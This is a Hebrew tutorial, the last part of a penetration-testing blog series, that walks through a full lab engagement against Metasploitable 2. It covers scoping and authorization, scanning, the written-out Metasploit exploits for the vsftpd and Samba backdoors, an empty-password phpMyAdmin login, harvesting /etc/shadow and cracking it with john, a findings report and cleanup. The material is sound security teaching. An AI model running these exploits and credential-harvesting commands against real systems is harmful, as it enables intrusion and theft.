הנתיב של ההאקר: סדרה בת 5 חלקים
חלק 1: מבוא ← חלק 2: שליטה ב-Flipper ← חלק 3: יסודות Kali ← חלק 4: ניצול ← חלק 5: הביקורת המלאה
התחלתם את הסדרה הזו בתהייה מה האקרים באמת עושים. למדתם שזה לא על קפוצ'ונים וטקסט ירוק. זו פתרון בעיות שיטתי. שיבטתם כרטיסים, מיפיתם רשתות, לכדתם handshakes והשגתם shells על מכונות פגיעות.
עכשיו אנחנו מחברים הכל. מאמר זה מוביל אתכם דרך בדיקת חדירה מלאה נגד מטרה פיקטיבית. כל שלב, כל החלטה, כל ממצא, מתועד בדיוק כפי שמקצוען היה עושה.
התרחיש
לקוח: Initech Labs (חברת טכנולוגיה קטנה פיקטיבית)
היקף: בדיקת חדירה לרשת פנימית
מטרה: זיהוי פגיעויות והדגמת השפעה עסקית פוטנציאלית
המטרה שלכם: רשת המעבדה שלכם (Kali + Metasploitable 2 + כל VM אחר שהגדרתם)
תכינו לעצמכם קפה. זה הולך להיות כיף.
שלב 1: טרום-התקשרות
לפני שנוגעים במקלדת, בודקי חדירה מקצועיים מטפלים בצד העסקי. דלגו על זה, ואתם לא בודק חדירה. אתם פשוט מישהו שמבצע עבירות.
שיחת תיחום
בהתקשרות אמיתית, תקיימו שיחה עם הלקוח כדי להבין:
- מה בהיקף? אילו רשתות, טווחי IP, אפליקציות?
- מה מחוץ להיקף? מערכות ייצור? שירותי צד שלישי?
- חלון בדיקות? מתי אפשר לבדוק? רק בשעות עבודה?
- אנשי קשר? למי מתקשרים אם משהו נשבר?
- מטרות? עמידה בתקנות או שיפור אבטחה אמיתי?
למעבדה שלכם
היקף: רק רשת המעבדה המבודדת שלכם. מחוץ להיקף: כל דבר אחר. חלון בדיקות: מתי שרוצים. מטרה: ללמוד דרך עשייה.
כללי התקשרות
להתקשרויות אמיתיות יש כללים כתובים. הנה מה שהם בדרך כלל מכסים:
- מכתב הרשאה - מסמך חתום שמוכיח שיש לכם אישור
- נהלי הסלמה - מה לעשות אם מוצאים משהו קריטי
- טיפול בנתונים - איך לטפל בנתונים רגישים שנתקלים בהם
- דרישות ניקוי - הסרת כל הכלים ודלתות אחוריות בסיום
- לוח זמנים לדוח - מתי הדוח הסופי צריך להיות מוכן?
תמיד השיגו אישור בכתב
גם לבדיקות "ידידותיות" ברשת של חבר. אימייל חתום שאומר "יש לך אישור לבדוק את הרשת שלי מתאריך עד תאריך" יכול להיות ההבדל בין חוויית למידה להרשעה פלילית. קחו את זה ברצינות.
שלב 2: סיור
הגיע הזמן ללמוד הכל על המטרה. בהתקשרות אמיתית, זה יכלול OSINT: חיפושי Google, פרופילי LinkedIn, אתרי חברה, רשומות DNS. למעבדה שלנו, אנחנו קופצים ישר לסיור אקטיבי.
צעד 1: גילוי רשת
שאלה ראשונה: מה יש ברשת הזו?
bash# מצאו את טווח הרשת שלכם
ip a | grep inet
# חפשו משהו כמו: inet 192.168.56.100/24
# גלו את כל ה-hosts הפעילים
sudo nmap -sn 192.168.56.0/24 -oA discovery
# תוצאות (דוגמה):
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00089s latency).
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).תעדו הכל. צרו פתק:
text# Initech Labs - גילוי רשת
# תאריך: 2026-03-08
# בודק: השם שלכם
192.168.56.1 - Gateway/Router
192.168.56.101 - לא ידוע (לחקירה)
192.168.56.102 - לא ידוע (לחקירה)צעד 2: סריקת פורטים
עכשיו חופרים עמוק יותר. אילו שירותים רצים?
bash# סריקת פורטים מלאה עם זיהוי שירותים
sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101
# זה לוקח זמן. לתוצאות מהירות בזמן למידה:
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101ב-Metasploitable 2, תראו אוצר:
textPORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open netbios-ssn Samba smbd 3.X
3306/tcp open mysql MySQL 5.0.51a
5432/tcp open postgresql PostgreSQL DB
...איזו חשיפה. בואו נעדכן את הפתקים:
text192.168.56.101 - שרת Linux (Metasploitable)
- FTP (21): vsftpd 2.3.4 # דלת אחורית ידועה!
- SSH (22): OpenSSH 4.7p1 # עתיק
- Telnet (23): פעיל # למה זה קיים ב-2026?
- HTTP (80): Apache 2.2.8 # אפליקציות וב לבדיקה
- SMB (139/445): Samba 3.X # מכרה זהב פוטנציאלי
- MySQL (3306): 5.0.51a # גישה לבסיס נתונים?
- PostgreSQL (5432): פעיל # בסיס נתונים נוסףצעד 3: זיהוי פגיעויות
הגיע הזמן לראות מה באמת ניתן לנצל.
bash# הרצת סקריפטים של פגיעויות
sudo nmap --script vuln -oA vuln_scan 192.168.56.101
# בדיקת שירותים ספציפיים ב-Metasploit
msfconsole
msf6 > search vsftpd
msf6 > search samba 3
msf6 > search apache 2.2הדלת האחורית של vsftpd 2.3.4 קופצת מיד לעין. זה shell מובטח. אבל בודק חדירה טוב לא עוצר בממצא הראשון. מתעדים הכל.
שלב 3: ניצול
כאן הדברים נהיים מרגשים. יש לנו מספר נקודות כניסה פוטנציאליות. בואו נעבוד עליהן באופן שיטתי.
וקטור התקפה 1: דלת אחורית FTP
bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned
[+] Command shell session 1 opened
whoami
root
id
uid=0(root) gid=0(root)ממצא מתועד: Root shell הושג דרך דלת אחורית FTP. זמן מהסריקה הראשונה עד פריצה מלאה: כ-10 דקות.
אבל אנחנו לא עוצרים כאן. למה עוד אפשר להגיע?
וקטור התקפה 2: Samba
bashbackground
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit
[*] Command shell session 2 opened
whoami
rootעוד root shell דרך וקטור שונה. שני נתיבים עצמאיים לפריצה מלאה.
וקטור התקפה 3: אפליקציות וב
בואו נראה מה רץ על פורט 80.
bashgobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt
# תוצאות:
/cgi-bin/ (Status: 403)
/dav/ (Status: 301)
/icons/ (Status: 301)
/index (Status: 200)
/phpMyAdmin/ (Status: 301)
/phpinfo (Status: 200)
/test/ (Status: 301)
/twiki/ (Status: 301)
nikto -h http://192.168.56.101phpMyAdmin עם אישורי ברירת מחדל? בואו נבדוק:
textUsername: root
Password: (ריק)
# גישה אושרה!גישת מנהל לבסיס נתונים ללא סיסמה. מכאן, נוכל לשאוב את כל הנתונים, לשנות רשומות או להשתמש בפעולות הקבצים של MySQL כדי לכתוב web shell.
וקטור התקפה 4: אישורי SSH חלשים
bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run
[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'אישורים חלשים מעניקים גישת SSH. לא root, אבל נטפל בזה בשלב הבא.
שלב 4: פוסט-ניצול
יש לנו גישה. ועכשיו מה? בדיקת חדירה אמיתית מדגימה השפעה עסקית. מה תוקף יכול באמת לעשות עם גישה זו?
קצירת אישורים
bashcat /etc/shadow
root:$1$xyz...truncated...:14889:0:99999:7:::
msfadmin:$1$abc...truncated...:14889:0:99999:7:::
user:$1$def...truncated...:14889:0:99999:7:::
postgres:$1$ghi...truncated...:14889:0:99999:7:::
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt
unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txtסיור רשת (מבפנים)
bashifconfig
route -n
cat /etc/hosts
arp -a
netstat -tulpn
ss -tulpn
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/nullגילוי נתונים רגישים
bashfind / -name "*.conf" 2>/dev/null | head -20
find / -name "*.sql" 2>/dev/null
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null
cat /var/www/*/config.php 2>/dev/null
cat /etc/mysql/my.cnf
mysql -u root -p
mysql> SHOW DATABASES;
mysql> SELECT * FROM mysql.user;הסלמת הרשאות (מ-msfadmin)
זוכרים את כניסת ה-SSH כ-msfadmin? בואו נעלה ל-root באמצעות מה שלמדנו בחלק 4.
bashssh [email protected]
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/crontabשלב 5: תיעוד וממצאים
הבדיקה חסרת ערך ללא דוח. זה מה שמפריד מקצוענים מ-script kiddies. צריך להסביר מה מצאתם, למה זה חשוב ואיך לתקן את זה.
סיכום ממצאים
הנה מה שמצאנו ברשת "Initech Labs", בפורמט כפי שיופיע בדוח אמיתי:
קריטי: דלת אחורית בשירות FTP (CVE-2011-2523)
מערכת מושפעת: 192.168.56.101
סיכון: הרצת קוד מרחוק ללא אימות כ-root
ראיה: Root shell מלא הושג תוך פחות מ-60 שניות
המלצה: עדכון מיידי של vsftpd לגרסה עדכנית או השבתה מלאה של שירות FTP.
קריטי: הרצת קוד מרחוק ב-Samba
מערכת מושפעת: 192.168.56.101
סיכון: הרצת קוד מרחוק ללא אימות כ-root
ראיה: Root shell מלא הושג דרך exploit usermap_script
המלצה: עדכון Samba לגרסה עדכנית. הגבלת גישת SMB למערכות נחוצות בלבד.
גבוה: גישת Root ל-MySQL ללא סיסמה
מערכת מושפעת: 192.168.56.101
סיכון: פריצה מלאה של בסיס נתונים, גניבת נתונים, פריסת web shell
ראיה: כניסה כ-root עם סיסמה ריקה דרך phpMyAdmin
המלצה: הגדרת סיסמת root חזקה. הגבלת גישה ל-phpMyAdmin.
גבוה: אישורי SSH חלשים
מערכת מושפעת: 192.168.56.101
סיכון: גישה מאומתת המובילה להסלמת הרשאות
ראיה: msfadmin:msfadmin אומת בהצלחה
המלצה: אכיפת מדיניות סיסמאות חזקות. הטמעת אימות SSH מבוסס מפתח.
בינוני: שירות Telnet מופעל
מערכת מושפעת: 192.168.56.101
סיכון: אישורים מועברים בטקסט גלוי
ראיה: פורט 23 פתוח ומקבל חיבורים
המלצה: השבתת Telnet. שימוש ב-SSH לכל ניהול מרחוק.
נמוך: דף phpinfo() חשוף
מערכת מושפעת: 192.168.56.101
סיכון: חשיפת מידע מסייעת להתקפות נוספות
ראיה: http://192.168.56.101/phpinfo נגיש ללא אימות
המלצה: הסרה או הגבלת גישה לדפי phpinfo.
תקציר מנהלים
זה מה שמנהלים באמת קוראים. שמרו על זה קצר, משפיע וללא ז'רגון:
תקציר מנהלים
במהלך בדיקת החדירה של הרשת הפנימית של Initech Labs, צוות האבטחה השיג שליטה מנהלתית מלאה על השרת הראשי תוך 10 דקות מתחילת ההערכה.
ממצאים מרכזיים:
- 2 פגיעויות קריטיות המאפשרות השתלטות מרחוק מיידית
- 2 בעיות חומרה גבוהה החושפות בסיסי נתונים ואישורי משתמש
- ממצאים בינוניים ונמוכים מרובים המצביעים על פערי אבטחה מערכתיים
שורה תחתונה: תוקף עם מיומנויות בסיסיות יכול לפרוץ למערכת זו תוך דקות. נדרשת תיקון מיידי לכל הממצאים הקריטיים והגבוהים.
שלב 6: ניקוי וסגירה
בודק חדירה מקצועי משאיר את הסביבה בדיוק כפי שמצא אותה.
bashmsf6 > sessions -l
msf6 > sessions -K
rm /tmp/linpeas.sh
rm /tmp/*.txt
userdel testuser
rm /home/*/.ssh/authorized_keysבהתקשרות אמיתית, גם:
- הסרת כל הכלים שהועלו במהלך הבדיקות
- תיעוד כל שינוי שנעשה בסביבה
- מסירת hashes/checksums של נתונים שחולצו
- מחיקה מאובטחת של כל נתוני הלקוח לאחר מסירת הדוח
רשימת בדיקה מתודולוגית מלאה
תהליך העבודה לשימוש חוזר לכל בדיקת חדירה:
מתודולוגיית בדיקת חדירה
- טרום-התקשרות
- הגדרת היקף וכללי התקשרות
- השגת הרשאה בכתב
- הקמת ערוצי תקשורת
- הגדרת סביבת בדיקה
- סיור
- גילוי רשת (ספירת hosts)
- סריקת פורטים וזיהוי שירותים
- סריקת פגיעויות
- ספירת אפליקציות וב
- תיעוד הכל
- ניצול
- אימות פגיעויות (אל תסמכו על סורקים באופן עיוור)
- ניצול פגיעויות מאומתות
- תיעוד כל פריצה מוצלחת
- לכידת ראיות (צילומי מסך, לוגים)
- פוסט-ניצול
- ספירת המערכת הפרוצה
- קצירת אישורים
- זיהוי נתונים רגישים
- ניסיון הסלמת הרשאות
- חיפוש הזדמנויות לתנועה לרוחב
- דיווח
- כתיבת תקציר מנהלים (השפעה עסקית)
- תיעוד כל הממצאים עם ראיות
- מתן המלצות לתיקון
- הכללת פרטים טכניים לצוותי IT
- ניקוי
- הסרת כל הכלים והחפצים
- סגירת כל הסשנים ודלתות אחוריות
- תיעוד שינויים בסביבה
- טיפול מאובטח בנתוני לקוח
מה הלאה: הנתיב שלכם קדימה
סיימתם את הנתיב של ההאקר. עברתם מ"מה זה בכלל פריצה?" לביצוע בדיקת חדירה מלאה. זה באמת מרשים.
אבל זו רק ההתחלה. הנה לאן ללכת מכאן:
פלטפורמות תרגול
- Hack The Box - מכונות ריאליסטיות לתרגול. התחילו עם boxes "קלים" שפרשו.
- TryHackMe - מסלולי למידה מודרכים.
- VulnHub - VMs פגיעים חינמיים להורדה ותרגול מקומי.
- PentesterLab - מיקוד באבטחת אפליקציות וב.
הסמכות (אם רוצים)
- eJPT - נקודת התחלה מצוינת, מבחן מעשי
- OSCP - תקן התעשייה, אכזרי אבל מכובד
- PNPT - מודרני, מעשי, כולל כתיבת דוחות
- CEH - לדרישות ארגוניות, פחות מעשי
התמחויות
- אבטחת אפליקציות וב - OWASP, Burp Suite, SQL injection, XSS
- Active Directory - רוב הסביבות הארגוניות משתמשות בזה
- אבטחת ענן - בדיקות AWS, Azure, GCP
- אבטחת מובייל - בדיקות אפליקציות Android/iOS
- Red Teaming - סימולציית יריב מלאה, פיזית + דיגיטלית
- הנדסה הפוכה - ניתוח malware, פיתוח exploits
בנו את מעבדת הבית שלכם
לבודקי החדירה הטובים ביותר יש מעבדות בית מפורטות. התחילו פשוט:
- הוסיפו Windows Server עם Active Directory
- הגדירו domain controller
- פרסו אפליקציות וב פגיעות (DVWA, bWAPP, WebGoat)
- בנו רשת עם מספר מקטעים
- הוסיפו HoneyAegis כדי לראות התקפות מנקודת מבט של מגן
הנתיב של ההאקר: הושלם
הצלחתם. כל חמשת החלקים, מסקרנים ליכולים.
חלק 1: מבוא חלק 2: שליטה ב-Flipper חלק 3: יסודות Kali חלק 4: ניצול חלק 5: הביקורת המלאה
הסדרה הושלמה - המסע שלכם
חלק 1: למדתם מה באמת פריצה והשגתם את הניצחונות הראשונים עם Flipper Zero
חלק 2: שלטתם בכל פרוטוקול Flipper: Sub-GHz, RFID, NFC, BadUSB, GPIO
חלק 3: בניתם את מעבדת Kali, למדתם nmap ולכדתם WiFi handshakes
חלק 4: שלטתם ב-Metasploit, ניצול, הסלמת הרשאות ו-pivoting
חלק 5: חיברתם הכל למתודולוגיית בדיקת חדירה מלאה
אבטחה היא לא יעד. היא תרגול. הכלים ישתנו, הפגיעויות יתפתחו, אבל המתודולוגיה נשארת. הטילו ספק בהכל. תעדו הכל. לעולם אל תפסיקו ללמוד.
ברוכים הבאים לצד השני.
- Lee